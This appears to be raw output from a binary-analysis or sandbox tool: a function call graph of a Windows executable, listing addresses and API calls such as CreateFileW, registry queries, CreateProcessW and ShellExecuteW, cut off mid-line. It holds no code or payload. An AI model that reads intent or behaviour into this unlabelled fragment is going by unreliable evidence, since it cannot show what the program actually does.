98694->98883 98817 7ff7c0e5d4cc 98696->98817 98697 7ff7c0eda6e6 98697->98686 98879 7ff7c0e57ab8 98697->98879 98701 7ff7c0eda7ee 98836 7ff7c0ecb3a8 98701->98836 98703 7ff7c0eda7a7 98704 7ff7c0e598e8 4 API calls 98703->98704 98706 7ff7c0eda7b5 98704->98706 98709 7ff7c0e5e0a8 4 API calls 98706->98709 98708 7ff7c0eda778 98708->98701 98708->98703 98710 7ff7c0eda7c2 98709->98710 98712 7ff7c0e571f8 4 API calls 98710->98712 98711 7ff7c0e57ab8 CloseHandle 98711->98686 98713 7ff7c0eda7d3 98712->98713 98714 7ff7c0ecb3a8 12 API calls 98713->98714 98715 7ff7c0eda7e0 Concurrency::wait 98714->98715 98715->98686 98886 7ff7c0e58314 98715->98886 98717 7ff7c0ed7e79 98716->98717 98718 7ff7c0e59640 4 API calls 98717->98718 98747 7ff7c0ed7f55 Concurrency::wait 98717->98747 98719 7ff7c0ed7ea6 98718->98719 98721 7ff7c0e59640 4 API calls 98719->98721 98720 7ff7c0e5834c 5 API calls 98722 7ff7c0ed7f99 98720->98722 98723 7ff7c0ed7eaf 98721->98723 98724 7ff7c0e5d4cc 48 API calls 98722->98724 98725 7ff7c0e5d4cc 48 API calls 98723->98725 98726 7ff7c0ed7fab 98724->98726 98727 7ff7c0ed7ebe 98725->98727 98728 7ff7c0e56838 16 API calls 98726->98728 98914 7ff7c0e574ac RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 98727->98914 98730 7ff7c0ed7fba 98728->98730 98732 7ff7c0ed7fbe GetLastError 98730->98732 98736 7ff7c0ed7ff5 98730->98736 98731 7ff7c0ed7ed8 98915 7ff7c0e57c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 98731->98915 98734 7ff7c0ed7fd8 98732->98734 98737 7ff7c0e57ab8 CloseHandle 98734->98737 98743 7ff7c0ed7fe5 98734->98743 98735 7ff7c0ed7f07 98735->98747 98916 7ff7c0ecbdd4 lstrlenW GetFileAttributesW FindFirstFileW FindClose 98735->98916 98738 7ff7c0e59640 4 API calls 98736->98738 98737->98743 98740 7ff7c0ed8035 98738->98740 98740->98743 98918 7ff7c0ec0d38 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 98740->98918 98741 7ff7c0ed7f17 98742 7ff7c0ed7f1b 98741->98742 98741->98747 98744 7ff7c0e5ec00 4 API calls 98742->98744 98743->98639 98746 7ff7c0ed7f28 98744->98746 98917 7ff7c0ecbab8 8 API calls Concurrency::wait 98746->98917 98747->98720 98747->98743 98749 7ff7c0ed7f31 Concurrency::wait 98749->98747 98751 7ff7c0eda680 98750->98751 98752 7ff7c0e5834c 5 API calls 98751->98752 98758 7ff7c0eda71a 98751->98758 98753 7ff7c0eda6be 98752->98753 98754 7ff7c0e5d4cc 48 API calls 98753->98754 98756 7ff7c0eda6d0 98754->98756 98755 7ff7c0eda7fd 98919 7ff7c0ed1864 6 API calls 98755->98919 98760 7ff7c0e56838 16 API calls 98756->98760 98758->98755 98759 7ff7c0eda6f3 98758->98759 98763 7ff7c0eda770 98758->98763 98759->98639 98762 7ff7c0eda6e2 98760->98762 98761 7ff7c0eda805 98766 7ff7c0ecb334 4 API calls 98761->98766 98762->98758 98764 7ff7c0eda6e6 98762->98764 98765 7ff7c0e5d4cc 48 API calls 98763->98765 98764->98759 98767 7ff7c0e57ab8 CloseHandle 98764->98767 98772 7ff7c0eda778 98765->98772 98782 7ff7c0eda7e0 Concurrency::wait 98766->98782 98767->98759 98768 7ff7c0eda7ee 98769 7ff7c0ecb3a8 12 API calls 98768->98769 98769->98782 98770 7ff7c0eda7a7 98771 7ff7c0e598e8 4 API calls 98770->98771 98774 7ff7c0eda7b5 98771->98774 98772->98768 98772->98770 98773 7ff7c0e58314 CloseHandle 98775 7ff7c0eda85c 98773->98775 98776 7ff7c0e5e0a8 4 API calls 98774->98776 98775->98759 98778 7ff7c0e57ab8 CloseHandle 98775->98778 98777 7ff7c0eda7c2 98776->98777 98779 7ff7c0e571f8 4 API calls 98777->98779 98778->98759 98780 7ff7c0eda7d3 98779->98780 98781 7ff7c0ecb3a8 12 API calls 98780->98781 98781->98782 98782->98759 98782->98773 98920 7ff7c0eef630 98783->98920 98785 7ff7c0eef1cd 98785->98639 98786 7ff7c0eef182 98786->98785 98988 7ff7c0e5ee20 5 API calls Concurrency::wait 98786->98988 98789 7ff7c0ed5ba5 98788->98789 98790 7ff7c0ed5ba9 98789->98790 98791 7ff7c0ed5be5 FindClose 98789->98791 98792 7ff7c0ed5bd5 98789->98792 98790->98639 98791->98790 98792->98790 98793 7ff7c0e57ab8 CloseHandle 98792->98793 98793->98790 98795 7ff7c0eef630 164 API calls 98794->98795 98796 7ff7c0eef0c2 98795->98796 98796->98639 98798 7ff7c0e5d4cc 48 API calls 98797->98798 98799 7ff7c0ed63f8 98798->98799 99017 7ff7c0ecbdec 98799->99017 98801 7ff7c0ed6404 98801->98639 98804 7ff7c0e5ec1d 98803->98804 98805 7ff7c0eaa5a2 98804->98805 98806 7ff7c0e74c68 4 API calls 98804->98806 98807 7ff7c0e5ec55 memcpy_s 98806->98807 98807->98639 98809->98626 98810->98632 98811->98632 98812->98618 98813->98640 98814->98640 98815->98639 98816->98640 98818 7ff7c0e5d50b 98817->98818 98831 7ff7c0e5d4f2 98817->98831 98819 7ff7c0e5d53e 98818->98819 98820 7ff7c0e5d513 98818->98820 98823 7ff7c0e5d550 98819->98823 98829 7ff7c0ea9cc4 98819->98829 98830 7ff7c0ea9bbc 98819->98830 98889 7ff7c0e7956c 31 API calls 98820->98889 98890 7ff7c0e74834 46 API calls 98823->98890 98824 7ff7c0ea9cdc 98825 7ff7c0e5d522 98828 7ff7c0e5ec00 4 API calls 98825->98828 98828->98831 98892 7ff7c0e79538 31 API calls 98829->98892 98832 7ff7c0e74c68 4 API calls 98830->98832 98835 7ff7c0ea9c3e Concurrency::wait wcscpy 98830->98835 98831->98708 98833 7ff7c0ea9c0a 98832->98833 98834 7ff7c0e5ec00 4 API calls 98833->98834 98834->98835 98891 7ff7c0e74834 46 API calls 98835->98891 98837 7ff7c0ecb3c8 98836->98837 98838 7ff7c0ecb42a 98836->98838 98839 7ff7c0ecb3d0 98837->98839 98840 7ff7c0ecb41e 98837->98840 98841 7ff7c0ecb334 4 API calls 98838->98841 98843 7ff7c0ecb3f1 98839->98843 98844 7ff7c0ecb3dd 98839->98844 98900 7ff7c0ecb458 8 API calls 98840->98900 98853 7ff7c0ecb410 Concurrency::wait 98841->98853 98898 7ff7c0e5a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98843->98898 98896 7ff7c0e5a368 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98844->98896 98847 7ff7c0ecb3e2 98897 7ff7c0e74120 6 API calls 98847->98897 98848 7ff7c0ecb3f6 98899 7ff7c0ecb270 6 API calls 98848->98899 98851 7ff7c0ecb3ef 98893 7ff7c0ecb384 98851->98893 98853->98715 98855 7ff7c0e74c68 4 API calls 98854->98855 98856 7ff7c0e58363 98855->98856 98857 7ff7c0e58314 CloseHandle 98856->98857 98858 7ff7c0e5836f 98857->98858 98859 7ff7c0e59640 4 API calls 98858->98859 98860 7ff7c0e58378 98859->98860 98861 7ff7c0e58314 CloseHandle 98860->98861 98862 7ff7c0e58380 98861->98862 98862->98688 98864 7ff7c0e58314 CloseHandle 98863->98864 98865 7ff7c0e5685a 98864->98865 98866 7ff7c0e5687d CreateFileW 98865->98866 98867 7ff7c0e9caa8 98865->98867 98872 7ff7c0e568ab 98866->98872 98868 7ff7c0e9caae CreateFileW 98867->98868 98875 7ff7c0e568d9 98867->98875 98869 7ff7c0e9cae6 98868->98869 98868->98872 98903 7ff7c0e56a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98869->98903 98871 7ff7c0e9caf3 98871->98872 98878 7ff7c0e568e4 98872->98878 98901 7ff7c0e568f4 9 API calls 98872->98901 98874 7ff7c0e568c1 98874->98875 98902 7ff7c0e56a18 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98874->98902 98876 7ff7c0ecb334 4 API calls 98875->98876 98875->98878 98876->98878 98878->98692 98878->98697 98904 7ff7c0e582e4 98879->98904 98882->98694 98909 7ff7c0ecb188 98883->98909 98887 7ff7c0e5833d CloseHandle 98886->98887 98888 7ff7c0e5832a 98886->98888 98887->98888 98888->98686 98888->98711 98889->98825 98890->98825 98891->98829 98892->98824 98894 7ff7c0ecb334 4 API calls 98893->98894 98895 7ff7c0ecb399 98894->98895 98895->98853 98896->98847 98897->98851 98898->98848 98899->98851 98900->98853 98901->98874 98902->98875 98903->98871 98905 7ff7c0e58314 CloseHandle 98904->98905 98906 7ff7c0e582f2 Concurrency::wait 98905->98906 98907 7ff7c0e58314 CloseHandle 98906->98907 98908 7ff7c0e58303 98907->98908 98910 7ff7c0ecb193 98909->98910 98911 7ff7c0ecb19c WriteFile 98909->98911 98913 7ff7c0ecb208 SetFilePointerEx SetFilePointerEx SetFilePointerEx 98910->98913 98911->98715 98913->98911 98914->98731 98915->98735 98916->98741 98917->98749 98918->98743 98919->98761 98922 7ff7c0eef671 __scrt_fastfail 98920->98922 98921 7ff7c0e5d4cc 48 API calls 98923 7ff7c0eef74d 98921->98923 98922->98921 98989 7ff7c0e5e330 98923->98989 98925 7ff7c0eef759 98926 7ff7c0eef762 98925->98926 98927 7ff7c0eef840 98925->98927 98929 7ff7c0e5d4cc 48 API calls 98926->98929 98928 7ff7c0eef87d GetCurrentDirectoryW 98927->98928 98930 7ff7c0e5d4cc 48 API calls 98927->98930 98931 7ff7c0e74c68 4 API calls 98928->98931 98932 7ff7c0eef777 98929->98932 98933 7ff7c0eef85c 98930->98933 98934 7ff7c0eef8a7 GetCurrentDirectoryW 98931->98934 98935 7ff7c0e5e330 4 API calls 98932->98935 98936 7ff7c0e5e330 4 API calls 98933->98936 98937 7ff7c0eef8b5 98934->98937 98938 7ff7c0eef783 98935->98938 98939 7ff7c0eef868 98936->98939 98940 7ff7c0eef8f0 98937->98940 99002 7ff7c0e6f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98937->99002 98941 7ff7c0e5d4cc 48 API calls 98938->98941 98939->98928 98939->98940 98946 7ff7c0eef905 98940->98946 98947 7ff7c0eef901 98940->98947 98943 7ff7c0eef798 98941->98943 98945 7ff7c0e5e330 4 API calls 98943->98945 98944 7ff7c0eef8d0 99003 7ff7c0e6f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98944->99003 98949 7ff7c0eef7a4 98945->98949 99005 7ff7c0ecfddc 8 API calls 98946->99005 98956 7ff7c0eef972 98947->98956 98957 7ff7c0eefa0f CreateProcessW 98947->98957 98951 7ff7c0e5d4cc 48 API calls 98949->98951 98950 7ff7c0eef8e0 99004 7ff7c0e6f688 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 98950->99004 98954 7ff7c0eef7b9 98951->98954 98959 7ff7c0e5e330 4 API calls 98954->98959 98955 7ff7c0eef90e 99006 7ff7c0ecfca8 8 API calls 98955->99006 99008 7ff7c0ebd1f8 99 API calls 98956->99008 98968 7ff7c0eef9b4 98957->98968 98961 7ff7c0eef7c5 98959->98961 98963 7ff7c0eef806 GetSystemDirectoryW 98961->98963 98965 7ff7c0e5d4cc 48 API calls 98961->98965 98962 7ff7c0eef926 99007 7ff7c0ecfafc 8 API calls ~SyncLockT 98962->99007 98967 7ff7c0e74c68 4 API calls 98963->98967 98969 7ff7c0eef7e1 98965->98969 98966 7ff7c0eef94f 98966->98947 98970 7ff7c0eef830 GetSystemDirectoryW 98967->98970 98971 7ff7c0eefabe CloseHandle 98968->98971 98978 7ff7c0eefa64 98968->98978 98972 7ff7c0e5e330 4 API calls 98969->98972 98970->98937 98973 7ff7c0eefaf5 98971->98973 98974 7ff7c0eefacc 98971->98974 98983 7ff7c0eef7ed 98972->98983 98975 7ff7c0eefafe 98973->98975 98980 7ff7c0eefb26 CloseHandle 98973->98980 99009 7ff7c0ecf7dc 98974->99009 98987 7ff7c0eefaa3 98975->98987 98981 7ff7c0eefa84 GetLastError 98978->98981 98980->98987 98981->98987 98983->98937 98983->98963 98993 7ff7c0ecf51c 98987->98993 98988->98785 98990 7ff7c0e5e342 98989->98990 98991 7ff7c0e74c68 4 API calls 98990->98991 98992 7ff7c0e5e361 wcscpy 98991->98992 98992->98925 98994 7ff7c0ecf7dc CloseHandle 98993->98994 98995 7ff7c0ecf52a 98994->98995 99014 7ff7c0ecf7b8 98995->99014 98998 7ff7c0ecf7b8 ~SyncLockT CloseHandle 98999 7ff7c0ecf53c 98998->98999 99000 7ff7c0ecf7b8 ~SyncLockT CloseHandle 98999->99000 99001 7ff7c0ecf545 99000->99001 99001->98786 99002->98944 99003->98950 99004->98940 99005->98955 99006->98962 99007->98966 99008->98968 99010 7ff7c0ecf7b8 ~SyncLockT CloseHandle 99009->99010 99011 7ff7c0ecf7ee 99010->99011 99012 7ff7c0ecf7b8 ~SyncLockT CloseHandle 99011->99012 99013 7ff7c0ecf7f7 99012->99013 99015 7ff7c0ecf533 99014->99015 99016 7ff7c0ecf7c9 CloseHandle 99014->99016 99015->98998 99016->99015 99020 7ff7c0ecc7c0 lstrlenW 99017->99020 99021 7ff7c0ecc7dd GetFileAttributesW 99020->99021 99022 7ff7c0ecbdf5 99020->99022 99021->99022 99023 7ff7c0ecc7eb FindFirstFileW 99021->99023 99022->98801 99023->99022 99024 7ff7c0ecc7ff FindClose 99023->99024 99024->99022 99025 7ff7c0e75328 99048 7ff7c0e74cac 99025->99048 99028 7ff7c0e75474 99078 7ff7c0e757e4 7 API calls __scrt_fastfail 99028->99078 99029 7ff7c0e75344 99031 7ff7c0e7547e 99029->99031 99032 7ff7c0e75362 99029->99032 99079 7ff7c0e757e4 7 API calls __scrt_fastfail 99031->99079 99034 7ff7c0e75387 99032->99034 99040 7ff7c0e753a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 99032->99040 99054 7ff7c0e8ada4 99032->99054 99036 7ff7c0e75489 abort 99037 7ff7c0e7540d 99061 7ff7c0e75930 99037->99061 99039 7ff7c0e75412 99064 7ff7c0e53730 99039->99064 99040->99037 99075 7ff7c0e79204 35 API calls FindHandler 99040->99075 99045 7ff7c0e75435 99045->99036 99077 7ff7c0e74e90 8 API calls 2 library calls 99045->99077 99047 7ff7c0e7544c 99047->99034 99049 7ff7c0e74cce __scrt_initialize_crt 99048->99049 99080 7ff7c0e765ec 99049->99080 99051 7ff7c0e74cd7 99051->99028 99051->99029 99052 7ff7c0e74cd3 __scrt_initialize_crt 99052->99051 99088 7ff7c0e76620 8 API calls 3 library calls 99052->99088 99055 7ff7c0e8adff 99054->99055 99056 7ff7c0e8ade0 99054->99056 99055->99040 99056->99055 99113 7ff7c0e51048 99056->99113 99118 7ff7c0e51080 99056->99118 99123 7ff7c0e510e8 99056->99123 99128 7ff7c0e51064 99056->99128 99327 7ff7c0e76240 99061->99327 99065 7ff7c0e537a3 99064->99065 99066 7ff7c0e53743 IsThemeActive 99064->99066 99076 7ff7c0e75974 GetModuleHandleW 99065->99076 99329 7ff7c0e792d0 99066->99329 99072 7ff7c0e5377d 99341 7ff7c0e537b0 99072->99341 99074 7ff7c0e53785 SystemParametersInfoW 99074->99065 99075->99037 99076->99045 99077->99047 99078->99031 99079->99036 99081 7ff7c0e765f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 99080->99081 99089 7ff7c0e77290 99081->99089 99084 7ff7c0e76603 99084->99052 99086 7ff7c0e7660c 99086->99084 99096 7ff7c0e772d8 DeleteCriticalSection 99086->99096 99088->99051 99092 7ff7c0e77298 99089->99092 99091 7ff7c0e772c9 99102 7ff7c0e772d8 DeleteCriticalSection 99091->99102 99092->99091 99094 7ff7c0e765ff 99092->99094 99097 7ff7c0e77614 99092->99097 99094->99084 99095 7ff7c0e77218 8 API calls 3 library calls 99094->99095 99095->99086 99096->99084 99103 7ff7c0e77310 99097->99103 99100 7ff7c0e77654 99100->99092 99101 7ff7c0e7765f InitializeCriticalSectionAndSpinCount 99101->99100 99102->99094 99104 7ff7c0e7736c try_get_function 99103->99104 99105 7ff7c0e77371 99103->99105 99104->99105 99106 7ff7c0e773a0 LoadLibraryExW 99104->99106 99109 7ff7c0e77454 99104->99109 99111 7ff7c0e77439 FreeLibrary 99104->99111 99112 7ff7c0e773fb LoadLibraryExW 99104->99112 99105->99100 99105->99101 99106->99104 99107 7ff7c0e773c1 GetLastError 99106->99107 99107->99104 99108 7ff7c0e77462 GetProcAddress 99110 7ff7c0e77473 99108->99110 99109->99105 99109->99108 99110->99105 99111->99104 99112->99104 99133 7ff7c0e57718 99113->99133 99117 7ff7c0e74f15 99117->99056 99153 7ff7c0e57920 99118->99153 99120 7ff7c0e5109e 99183 7ff7c0e74ebc 34 API calls _onexit 99120->99183 99122 7ff7c0e74f15 99122->99056 99217 7ff7c0e71d80 99123->99217 99127 7ff7c0e74f15 99127->99056 99242 7ff7c0e57ec0 99128->99242 99130 7ff7c0e5106d 99278 7ff7c0e74ebc 34 API calls _onexit 99130->99278 99132 7ff7c0e74f15 99132->99056 99134 7ff7c0e59640 4 API calls 99133->99134 99135 7ff7c0e5778f 99134->99135 99142 7ff7c0e56f24 99135->99142 99137 7ff7c0e9d042 99139 7ff7c0e5782c 99139->99137 99140 7ff7c0e51051 99139->99140 99145 7ff7c0e57410 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 99139->99145 99141 7ff7c0e74ebc 34 API calls _onexit 99140->99141 99141->99117 99146 7ff7c0e56f60 99142->99146 99145->99139 99147 7ff7c0e56f85 99146->99147 99148 7ff7c0e56f52 99146->99148 99147->99148 99149 7ff7c0e56f93 RegOpenKeyExW 99147->99149 99148->99139 99149->99148 99150 7ff7c0e56faf RegQueryValueExW 99149->99150 99151 7ff7c0e56ff5 RegCloseKey 99150->99151 99152 7ff7c0e56fdd 99150->99152 99151->99148 99152->99151 99154 7ff7c0e57948 wcsftime 99153->99154 99155 7ff7c0e59640 4 API calls 99154->99155 99156 7ff7c0e57a02 99155->99156 99184 7ff7c0e55680 99156->99184 99158 7ff7c0e57a0c 99191 7ff7c0e73a38 99158->99191 99161 7ff7c0e571f8 4 API calls 99162 7ff7c0e57a2c 99161->99162 99197 7ff7c0e54680 99162->99197 99164 7ff7c0e57a3d 99165 7ff7c0e59640 4 API calls 99164->99165 99166 7ff7c0e57a47 99165->99166 99201 7ff7c0e5a854 99166->99201 99169 7ff7c0e9d05c RegQueryValueExW 99170 7ff7c0e9d08f 99169->99170 99171 7ff7c0e9d131 RegCloseKey 99169->99171 99172 7ff7c0e74c68 4 API calls 99170->99172 99173 7ff7c0e57a83 Concurrency::wait 99171->99173 99181 7ff7c0e9d147 wcscat Concurrency::wait 99171->99181 99174 7ff7c0e9d0b2 99172->99174 99173->99120 99175 7ff7c0e9d0bf RegQueryValueExW 99174->99175 99176 7ff7c0e9d0f3 99175->99176 99178 7ff7c0e9d112 99175->99178 99177 7ff7c0e57cf4 4 API calls 99176->99177 99177->99178 99178->99171 99179 7ff7c0e5ec00 4 API calls 99179->99181 99180 7ff7c0e54680 4 API calls 99180->99181 99181->99173 99181->99179 99181->99180 99182 7ff7c0e59d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99181->99182 99182->99181 99183->99122 99205 7ff7c0e98f90 99184->99205 99186 7ff7c0e5568c GetModuleFileNameW 99187 7ff7c0e5ec00 4 API calls 99186->99187 99188 7ff7c0e556b4 99187->99188 99207 7ff7c0e556d4 99188->99207 99190 7ff7c0e556c1 Concurrency::wait 99190->99158 99192 7ff7c0e98f90 wcsftime 99191->99192 99193 7ff7c0e73a44 GetFullPathNameW 99192->99193 99194 7ff7c0e73a74 99193->99194 99195 7ff7c0e57cf4 4 API calls 99194->99195 99196 7ff7c0e57a1b 99195->99196 99196->99161 99198 7ff7c0e5469f 99197->99198 99199 7ff7c0e546c8 memcpy_s 99197->99199 99200 7ff7c0e74c68 4 API calls 99198->99200 99199->99164 99200->99199 99202 7ff7c0e57a51 RegOpenKeyExW 99201->99202 99203 7ff7c0e5a87a 99201->99203 99202->99169 99202->99173 99204 7ff7c0e74c68 4 API calls 99203->99204 99204->99202 99206 7ff7c0e98fbb 99205->99206 99206->99186 99206->99206 99208 7ff7c0e98f90 wcsftime 99207->99208 99209 7ff7c0e556e9 GetFullPathNameW 99208->99209 99210 7ff7c0e9c03a 99209->99210 99211 7ff7c0e55712 99209->99211 99212 7ff7c0e5a854 4 API calls 99210->99212 99213 7ff7c0e57cf4 4 API calls 99211->99213 99214 7ff7c0e5571c 99212->99214 99213->99214 99215 7ff7c0e5dda4 4 API calls 99214->99215 99216 7ff7c0e55785 99215->99216 99216->99190 99218 7ff7c0e59640 4 API calls 99217->99218 99219 7ff7c0e71db2 GetVersionExW 99218->99219 99220 7ff7c0e57cf4 4 API calls 99219->99220 99222 7ff7c0e71dfc 99220->99222 99221 7ff7c0e5dda4 4 API calls 99221->99222 99222->99221 99222->99222 99223 7ff7c0e71e87 99222->99223 99224 7ff7c0e5dda4 4 API calls 99223->99224 99231 7ff7c0e71ea4 99224->99231 99225 7ff7c0eb9645 99226 7ff7c0eb964f 99225->99226 99240 7ff7c0ec32f4 LoadLibraryA GetProcAddress 99226->99240 99227 7ff7c0e71f3c GetCurrentProcess IsWow64Process 99228 7ff7c0e71f7e __scrt_fastfail 99227->99228 99228->99226 99230 7ff7c0e71f86 GetSystemInfo 99228->99230 99233 7ff7c0e510f1 99230->99233 99231->99225 99231->99227 99232 7ff7c0eb96b1 99234 7ff7c0eb96b5 99232->99234 99235 7ff7c0eb96d7 GetSystemInfo 99232->99235 99239 7ff7c0e74ebc 34 API calls _onexit 99233->99239 99241 7ff7c0ec32f4 LoadLibraryA GetProcAddress 99234->99241 99237 7ff7c0eb96bf 99235->99237 99237->99233 99238 7ff7c0eb96f0 FreeLibrary 99237->99238 99238->99233 99239->99127 99240->99232 99241->99237 99279 7ff7c0e582b4 99242->99279 99245 7ff7c0e582b4 4 API calls 99246 7ff7c0e57f3a 99245->99246 99247 7ff7c0e59640 4 API calls 99246->99247 99248 7ff7c0e57f46 99247->99248 99249 7ff7c0e57cf4 4 API calls 99248->99249 99250 7ff7c0e57f59 99249->99250 99286 7ff7c0e72d5c 6 API calls 99250->99286 99252 7ff7c0e57fa5 99253 7ff7c0e59640 4 API calls 99252->99253 99254 7ff7c0e57fb1 99253->99254 99255 7ff7c0e59640 4 API calls 99254->99255 99256 7ff7c0e57fbd 99255->99256 99257 7ff7c0e59640 4 API calls 99256->99257 99258 7ff7c0e57fc9 99257->99258 99259 7ff7c0e59640 4 API calls 99258->99259 99260 7ff7c0e5800f 99259->99260 99261 7ff7c0e59640 4 API calls 99260->99261 99262 7ff7c0e580f7 99261->99262 99287 7ff7c0e6ef88 99262->99287 99264 7ff7c0e58103 99294 7ff7c0e6eec8 99264->99294 99266 7ff7c0e5812f 99267 7ff7c0e59640 4 API calls 99266->99267 99268 7ff7c0e5813b 99267->99268 99305 7ff7c0e66d40 99268->99305 99272 7ff7c0e581ac 99273 7ff7c0e581be GetStdHandle 99272->99273 99274 7ff7c0e9d350 99273->99274 99275 7ff7c0e58220 OleInitialize 99273->99275 99322 7ff7c0ecffc8 CreateThread 99274->99322 99275->99130 99277 7ff7c0e9d367 CloseHandle 99278->99132 99280 7ff7c0e59640 4 API calls 99279->99280 99281 7ff7c0e582c6 99280->99281 99282 7ff7c0e59640 4 API calls 99281->99282 99283 7ff7c0e582cf 99282->99283 99284 7ff7c0e59640 4 API calls 99283->99284 99285 7ff7c0e57f2e 99284->99285 99285->99245 99286->99252 99288 7ff7c0e59640 4 API calls 99287->99288 99289 7ff7c0e6efa3 99288->99289 99290 7ff7c0e59640 4 API calls 99289->99290 99291 7ff7c0e6efac 99290->99291 99292 7ff7c0e59640 4 API calls 99291->99292 99293 7ff7c0e6f02e 99292->99293 99293->99264 99295 7ff7c0e6eede 99294->99295 99296 7ff7c0e59640 4 API calls 99295->99296 99297 7ff7c0e6eeea 99296->99297 99298 7ff7c0e59640 4 API calls 99297->99298 99299 7ff7c0e6eef6 99298->99299 99300 7ff7c0e59640 4 API calls 99299->99300 99301 7ff7c0e6ef02 99300->99301 99302 7ff7c0e59640 4 API calls 99301->99302 99303 7ff7c0e6ef0e 99302->99303 99304 7ff7c0e6ef68 RegisterWindowMessageW 99303->99304 99304->99266 99306 7ff7c0e66db9 99305->99306 99312 7ff7c0e66d80 99305->99312 99323 7ff7c0e75114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99306->99323 99314 7ff7c0e5816b 99312->99314 99324 7ff7c0e75114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99312->99324 99315 7ff7c0e739a8 99314->99315 99316 7ff7c0eba502 99315->99316 99321 7ff7c0e739cc 99315->99321 99325 7ff7c0e5ee20 5 API calls Concurrency::wait 99316->99325 99318 7ff7c0eba50e 99326 7ff7c0e5ee20 5 API calls Concurrency::wait 99318->99326 99320 7ff7c0eba52d 99321->99272 99322->99277 99325->99318 99326->99320 99328 7ff7c0e75947 GetStartupInfoW 99327->99328 99328->99039 99387 7ff7c0e8b9bc EnterCriticalSection 99329->99387 99331 7ff7c0e792e4 99332 7ff7c0e8ba10 _isindst LeaveCriticalSection 99331->99332 99333 7ff7c0e5376e 99332->99333 99334 7ff7c0e79334 99333->99334 99335 7ff7c0e7933d 99334->99335 99336 7ff7c0e53778 99334->99336 99388 7ff7c0e855d4 15 API calls _invalid_parameter_noinfo 99335->99388 99340 7ff7c0e536e8 SystemParametersInfoW SystemParametersInfoW 99336->99340 99338 7ff7c0e79342 99389 7ff7c0e8b164 31 API calls _invalid_parameter_noinfo 99338->99389 99340->99072 99342 7ff7c0e537cd wcsftime 99341->99342 99343 7ff7c0e59640 4 API calls 99342->99343 99344 7ff7c0e537dd GetCurrentDirectoryW 99343->99344 99390 7ff7c0e557a0 99344->99390 99346 7ff7c0e53807 IsDebuggerPresent 99347 7ff7c0e9b872 MessageBoxA 99346->99347 99348 7ff7c0e53815 99346->99348 99349 7ff7c0e9b894 99347->99349 99348->99349 99350 7ff7c0e53839 99348->99350 99500 7ff7c0e5e278 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99349->99500 99464 7ff7c0e53f04 99350->99464 99354 7ff7c0e53860 GetFullPathNameW 99355 7ff7c0e57cf4 4 API calls 99354->99355 99356 7ff7c0e538a6 99355->99356 99480 7ff7c0e53f9c 99356->99480 99357 7ff7c0e538bf 99359 7ff7c0e9b8dc SetCurrentDirectoryW 99357->99359 99360 7ff7c0e538c7 99357->99360 99359->99360 99361 7ff7c0e538d0 99360->99361 99501 7ff7c0ebd540 AllocateAndInitializeSid CheckTokenMembership FreeSid 99360->99501 99496 7ff7c0e53b84 7 API calls 99361->99496 99364 7ff7c0e9b8f8 99364->99361 99367 7ff7c0e9b90c 99364->99367 99369 7ff7c0e55680 6 API calls 99367->99369 99368 7ff7c0e538da 99371 7ff7c0e56258 46 API calls 99368->99371 99374 7ff7c0e538ef 99368->99374 99370 7ff7c0e9b916 99369->99370 99372 7ff7c0e5ec00 4 API calls 99370->99372 99371->99374 99373 7ff7c0e9b927 99372->99373 99376 7ff7c0e9b930 99373->99376 99377 7ff7c0e9b94d 99373->99377 99375 7ff7c0e53913 99374->99375 99378 7ff7c0e55d88 Shell_NotifyIconW 99374->99378 99380 7ff7c0e5391f SetCurrentDirectoryW 99375->99380 99379 7ff7c0e571f8 4 API calls 99376->99379 99382 7ff7c0e571f8 4 API calls 99377->99382 99378->99375 99381 7ff7c0e9b93c 99379->99381 99383 7ff7c0e53934 Concurrency::wait 99380->99383 99502 7ff7c0e57c24 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::wait 99381->99502 99385 7ff7c0e9b963 GetForegroundWindow ShellExecuteW 99382->99385 99383->99074 99386 7ff7c0e9b99f Concurrency::wait 99385->99386 99386->99375 99388->99338 99389->99336 99391 7ff7c0e59640 4 API calls 99390->99391 99392 7ff7c0e557d7 99391->99392 99503 7ff7c0e59bbc 99392->99503 99394 7ff7c0e557fe 99395 7ff7c0e55680 6 API calls 99394->99395 99396 7ff7c0e55812 99395->99396 99397 7ff7c0e5ec00 4 API calls 99396->99397 99398 7ff7c0e55823 99397->99398 99517 7ff7c0e56460 99398->99517 99401 7ff7c0e5584e Concurrency::wait 99405 7ff7c0e5e0a8 4 API calls 99401->99405 99402 7ff7c0e9c05e 99590 7ff7c0ed2948 99402->99590 99404 7ff7c0e9c074 99406 7ff7c0e9c081 99404->99406 99407 7ff7c0e5652c 63 API calls 99404->99407 99408 7ff7c0e5586a 99405->99408 99608 7ff7c0e5652c 99406->99608 99407->99406 99410 7ff7c0e5ec00 4 API calls 99408->99410 99411 7ff7c0e55888 99410->99411 99416 7ff7c0e9c099 99411->99416 99543 7ff7c0e5eff8 99411->99543 99413 7ff7c0e558ad Concurrency::wait 99414 7ff7c0e5ec00 4 API calls 99413->99414 99415 7ff7c0e558d7 99414->99415 99415->99416 99417 7ff7c0e5eff8 46 API calls 99415->99417 99418 7ff7c0e55ab4 4 API calls 99416->99418 99420 7ff7c0e558fc Concurrency::wait 99417->99420 99419 7ff7c0e9c0e1 99418->99419 99421 7ff7c0e55ab4 4 API calls 99419->99421 99423 7ff7c0e59640 4 API calls 99420->99423 99422 7ff7c0e9c103 99421->99422 99426 7ff7c0e55680 6 API 